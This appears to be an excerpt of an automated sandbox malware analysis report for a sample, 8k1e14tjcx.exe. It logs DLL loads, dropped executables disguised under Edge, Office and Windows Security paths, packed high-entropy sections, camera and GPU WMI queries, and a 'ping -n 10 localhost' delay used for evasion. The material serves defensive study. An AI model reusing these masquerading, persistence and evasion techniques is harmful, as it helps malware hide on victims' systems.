                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\8k1e14tjcx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\db08104604e511
Source: 8k1e14tjcx.exe | Static file information: File size 2365778 > 1048576
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8k1e14tjcx.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8k1e14tjcx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8k1e14tjcx.exe
Source: 8k1e14tjcx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8k1e14tjcx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8k1e14tjcx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8k1e14tjcx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8k1e14tjcx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\8k1e14tjcx.exe | File created: C:\ChainagentComponent\__tmp_rar_sfx_access_check_4427890
Source: 8k1e14tjcx.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\8k1e14tjcx.exe | Code function: 0_2_00EAF640 push ecx; ret 0_2_00EAF653
Source: C:\Users\user\Desktop\8k1e14tjcx.exe | Code function: 0_2_00EAEB78 push eax; ret 0_2_00EAEB96
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Code function: 4_2_00007FFD9B7D00AD pushad ; iretd 4_2_00007FFD9B7D00C1
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Code function: 4_2_00007FFD9B932730 push eax; retf 0009h 4_2_00007FFD9B932731
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Code function: 4_2_00007FFD9B932F30 push eax; retn 0009h 4_2_00007FFD9B932F31
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | Code function: 4_2_00007FFD9BBE6116 push eax; ret 4_2_00007FFD9BBE613D
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | Code function: 9_2_00007FFD9BB82F30 push eax; retn 0009h 9_2_00007FFD9BB82F31
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | Code function: 9_2_00007FFD9BE36116 push eax; ret 9_2_00007FFD9BE3613D
Source: ChainFontruntimeCrt.exe.0.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe.4.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe0.4.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: OfficeClickToRun.exe.4.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe1.4.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: yeeQesPXxpnDuwPWqTnUoVbi.exe2.4.dr | Static PE information: section name: .text entropy: 7.5758361246531685
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\phDaBATS.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\odxAFePx.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\ZXODDOCy.log
Source: C:\Users\user\Desktop\8k1e14tjcx.exe | File created: C:\ChainagentComponent\ChainFontruntimeCrt.exe
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\hgJAcPUI.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\xHFppYee.log
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\otzSQnXU.log
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\MyEwMoxX.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\HZSnKfqJ.log
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\xWHHAgmB.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\PjjNTCHQ.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\QZsVJdpt.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\sUnrMbPq.log
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | File created: C:\Users\user\Desktop\GFbXjJsj.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Users\user\Desktop\HqZFZAkM.log
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe | File created: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe, Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Memory allocated: 930000 memory reserve | memory write watch
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Memory allocated: 1A750000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Memory allocated: D90000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Memory allocated: 1AA20000 memory reserve | memory write watch
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599890
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599781
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599670
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599547
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599438
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599313
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599188
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 599063
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598953
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe Thread delayed: delay time: 598844
